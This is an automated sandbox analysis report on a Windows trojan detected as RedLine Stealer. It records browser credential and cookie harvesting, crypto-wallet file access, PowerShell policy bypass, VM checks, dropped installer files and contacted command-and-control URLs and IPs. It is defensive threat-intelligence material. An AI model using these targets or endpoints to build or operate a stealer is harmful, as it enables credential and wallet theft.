                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B7AB3308D1EA4477BA1480125A6FBDA936490CBB BlobJump to behavior
                  Source: powershell.exe, 00000005.00000002.538775864.0000000007145000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.514940263.0000000008186000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.521530251.00000000009B6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.516175434.0000000008197000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                  Stealing of Sensitive Information

                  barindex
                  Yara detected RedLine Stealer
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumE#
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: JaxxE#
                  Source: powershell.exe, 00000005.00000002.544193996.0000000008241000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                  Source: powershell.exe, 00000005.00000002.543074516.000000000814C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\wallets\*
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusE#
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: EthereumE#
                  Source: powershell.exe, 00000005.00000002.544193996.0000000008241000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                  Source: powershell.exe, 00000005.00000002.546026802.0000000008F20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Tries to steal Crypto Currency Wallets
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: Yara matchFile source: 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected RedLine Stealer
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  1
                  Replication Through Removable Media                  		221
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		1
                  System Time Discovery                  		1
                  Replication Through Removable Media                  		1
                  Archive Collected Data                  		Exfiltration Over Other Network Medium1
                  Ingress Tool Transfer                  		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default Accounts1
                  Native API                  		Boot or Logon Initialization Scripts12
                  Process Injection                  		1
                  Deobfuscate/Decode Files or Information                  		LSASS Memory11
                  Peripheral Device Discovery                  		Remote Desktop Protocol3
                  Data from Local System                  		Exfiltration Over Bluetooth11
                  Encrypted Channel                  		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain Accounts12
                  Command and Scripting Interpreter                  		Logon Script (Windows)Logon Script (Windows)2
                  Obfuscated Files or Information                  		Security Account Manager1
                  Account Discovery                  		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                  Non-Standard Port                  		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local Accounts1
                  PowerShell                  		Logon Script (Mac)Logon Script (Mac)1
                  Timestomp                  		NTDS2
                  File and Directory Discovery                  		Distributed Component Object ModelInput CaptureScheduled Transfer2
                  Non-Application Layer Protocol                  		SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading                  		LSA Secrets117
                  System Information Discovery                  		SSHKeyloggingData Transfer Size Limits13
                  Application Layer Protocol                  		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common1
                  File Deletion                  		Cached Domain Credentials1
                  Query Registry                  		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items21
                  Masquerading                  		DCSync251
                  Security Software Discovery                  		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                  Modify Registry                  		Proc Filesystem1
                  Process Discovery                  		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)231
                  Virtualization/Sandbox Evasion                  		/etc/passwd and /etc/shadow231
                  Virtualization/Sandbox Evasion                  		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                  Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)12
                  Process Injection                  		Network Sniffing1
                  Application Window Discovery                  		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                  Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture1
                  System Owner/User Discovery                  		Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                  Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeylogging1
                  Remote System Discovery                  		Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1294691 Sample: SecuriteInfo.com.Win32.Troj... Startdate: 21/08/2023 Architecture: WINDOWS Score: 52 51 Snort IDS alert for network traffic 2->51 53 Multi AV Scanner detection for submitted file 2->53 55 Yara detected RedLine Stealer 2->55 57 2 other signatures 2->57 8 msiexec.exe 15 35 2->8         started        11 SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe 22 2->11         started        process3 file4 27 C:\Windows\Installer\446fc6.msi, Composite 8->27 dropped 29 C:\Windows\Installer\MSI76F0.tmp, PE32 8->29 dropped 31 C:\Windows\Installer\MSI750A.tmp, PE32 8->31 dropped 39 5 other files (none is malicious) 8->39 dropped 13 msiexec.exe 9 8->13         started        16 msiexec.exe 8->16         started        33 C:\Users\user\AppData\Roaming\...\Helper.msi, Composite 11->33 dropped 35 C:\Users\user\AppData\Local\...\shi69FA.tmp, PE32+ 11->35 dropped 37 C:\Users\user\AppData\Local\...\MSI6AF5.tmp, PE32 11->37 dropped 19 msiexec.exe 2 11->19         started        process5 file6 41 C:\Users\user\AppData\Local\...\scr77D6.ps1, Unicode 13->41 dropped 43 C:\Users\user\AppData\Local\...\pss77D9.ps1, Unicode 13->43 dropped 21 powershell.exe 15 18 13->21         started        49 Bypasses PowerShell execution policy 16->49 signatures7 process8 dnsIp9 45 45.135.232.24, 49735, 49736, 49737 ASBAXETNRU Russian Federation 21->45 47 prkl-ads.ru 81.177.140.69, 443, 49723, 49724 RTCOMM-ASRU Russian Federation 21->47 59 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 21->59 61 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 21->61 63 Tries to harvest and steal browser information (history, passwords, etc) 21->63 65 Tries to steal Crypto Currency Wallets 21->65 25 conhost.exe 21->25         started        signatures10 process11

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe13%ReversingLabs
                  SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe11%VirustotalBrowse

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\MSI6AF5.tmp0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\shi69FA.tmp0%ReversingLabs
                  C:\Users\user\AppData\Roaming\Helper Company LLC\Helper\7z2201-x64.exe0%ReversingLabs
                  C:\Windows\Installer\MSI7331.tmp0%ReversingLabs
                  C:\Windows\Installer\MSI73EE.tmp0%ReversingLabs
                  C:\Windows\Installer\MSI745C.tmp0%ReversingLabs
                  C:\Windows\Installer\MSI74BB.tmp0%ReversingLabs
                  C:\Windows\Installer\MSI750A.tmp0%ReversingLabs
                  C:\Windows\Installer\MSI76F0.tmp0%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://tempuri.org/Contract/MSValue2Response0%URL Reputationsafe
                  http://tempuri.org/0%URL Reputationsafe
                  http://tempuri.org/0%URL Reputationsafe
                  http://ns.adobe.c/g0%URL Reputationsafe
                  http://ocsp.digicert0%URL Reputationsafe
                  http://schemas.datacontract.org/2004/07/EInvalidGlobalDataContractNamespace?DataContractNamespaceAlr0%URL Reputationsafe
                  http://schemas.datacontract.org/2004/07/System.Xml.Linq?IsValueTypeFormattedIncorrectly1BaseTypeNotI0%URL Reputationsafe
                  https://api.ip.sb/ip0%URL Reputationsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                  https://go.micro0%URL Reputationsafe
                  https://prkl-ads.ru/?status=reg&key=llks74638sj&site=Test0%Avira URL Cloudsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  http://tempuri.org/Contract/MSValue3ResponseD0%Avira URL Cloudsafe
                  https://prkl-ads.ru/?status=start&av=Windows0%Avira URL Cloudsafe
                  https://prkl-ads.ru/?status=start&av=0%Avira URL Cloudsafe
                  http://tempuri.org/Contract/MSValue3Response0%URL Reputationsafe
                  http://crl.microsof0%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  http://ocsps.ssl.com00%URL Reputationsafe
                  http://tempuri.org/Contract/MSValue10%URL Reputationsafe
                  http://schemas.datacontract.org/2004/07/System.Xml0%URL Reputationsafe
                  http://tempuri.org/Contract/MSValue20%URL Reputationsafe
                  https://prkl-ads.ru/?status=install(:0%Avira URL Cloudsafe
                  http://tempuri.org/Contract/MSValue30%URL Reputationsafe
                  http://tempuri.org/D0%URL Reputationsafe
                  https://prkl-ads.ru/?status=start&av=Windows%20Defender0%Avira URL Cloudsafe
                  https://prkl-ads.ru/?status=install0%Avira URL Cloudsafe
                  https://prkl-ads.ru/?status=start&av=$displayNamesString0%Avira URL Cloudsafe
                  http://tempuri.org/Contract/MSValue2ResponseD0%Avira URL Cloudsafe
                  http://crls.ssl.co0%Avira URL Cloudsafe
                  https://prkl-ads.ru0%Avira URL Cloudsafe
                  http://html4/loose.dtd0%Avira URL Cloudsafe
                  http://.css0%Avira URL Cloudsafe
                  https://prkl-ads.ru?status=reg&key=llks74638sj&site=Test0%Avira URL Cloudsafe
                  https://ac.ecLR0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  prkl-ads.ru
                  		81.177.140.69
                  		truefalse
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://prkl-ads.ru/?status=reg&key=llks74638sj&site=Testfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://prkl-ads.ru/?status=start&av=Windows%20Defenderfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://prkl-ads.ru/?status=installfalse
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Textpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/ws/2005/02/sc/sctpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://duckduckgo.com/chrome_newtabpowershell.exe, 00000005.00000002.528616904.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.000000000509A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.00000000051FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A52D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006972000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A493000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000699B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.000000000514C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006901000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.00000000068D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A4BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A556000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006A35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000683D000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://prkl-ads.ru/?status=start&av=powershell.exe, 00000005.00000002.523653859.0000000004BD9000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://duckduckgo.com/ac/?q=powershell.exe, 00000005.00000002.528616904.0000000006866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000683D000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0QSecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI76B1.tmp.1.drfalse
                                		high
                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinarypowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://tempuri.org/Contract/MSValue3ResponseDpowershell.exe, 00000005.00000002.556972704.000000000DD11000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://tempuri.org/Contract/MSValue2Responsepowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://tempuri.org/powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.559613303.0000000068728000.00000020.00000001.01000000.0000001A.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://ns.adobe.c/gpowershell.exe, 00000005.00000002.541635765.0000000007DD8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.497379315.0000000007DC2000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrappowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/Preparepowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://prkl-ads.ru/?status=start&av=Windowspowershell.exe, 00000005.00000002.523653859.0000000004D48000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://ocsp.digicertSecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.565831914.0000000001486000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.562864439.0000000001486000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licensepowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuepowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/Abortedpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequencepowershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.528616904.0000000005B06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://schemas.datacontract.org/2004/07/EInvalidGlobalDataContractNamespace?DataContractNamespaceAlrpowershell.exe, 00000005.00000002.559613303.0000000068728000.00000020.00000001.01000000.0000001A.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/faultpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/ws/2004/10/wsatpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeypowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://prkl-ads.ru/?status=install(:powershell.exe, 00000005.00000002.523653859.0000000004BD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://schemas.datacontract.org/2004/07/System.Xml.Linq?IsValueTypeFormattedIncorrectly1BaseTypeNotIpowershell.exe, 00000005.00000002.559613303.0000000068728000.00000020.00000001.01000000.0000001A.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.523653859.0000000004AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renewpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://schemas.xmlsoap.org/ws/2004/10/wscoor/Registerpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeypowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://api.ip.sb/ippowershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.523653859.0000000004BD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.404099594.00000000070DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://schemas.datacontract.org/2004/07/powershell.exe, 00000005.00000002.559613303.0000000068728000.00000020.00000001.01000000.0000001A.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.523653859.0000000004BD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.404099594.00000000070DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/ws/2004/04/scpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://go.micropowershell.exe, 00000005.00000003.403270333.00000000054FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancelpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://contoso.com/Iconpowershell.exe, 00000005.00000002.528616904.0000000005B06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=powershell.exe, 00000005.00000002.528616904.0000000006866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000683D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://tempuri.org/Contract/MSValue3Responsepowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.556972704.000000000DD11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issuepowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.ecosia.org/newtab/powershell.exe, 00000005.00000002.528616904.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.000000000509A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.00000000051FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A52D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006972000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A493000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000699B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.000000000514C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006901000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.00000000068D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A4BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A556000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006A35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000683D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=powershell.exe, 00000005.00000002.528616904.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.000000000509A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.00000000051FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A52D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006972000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A493000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000699B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.000000000514C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006901000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.00000000068D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A4BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A556000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006A35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000683D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
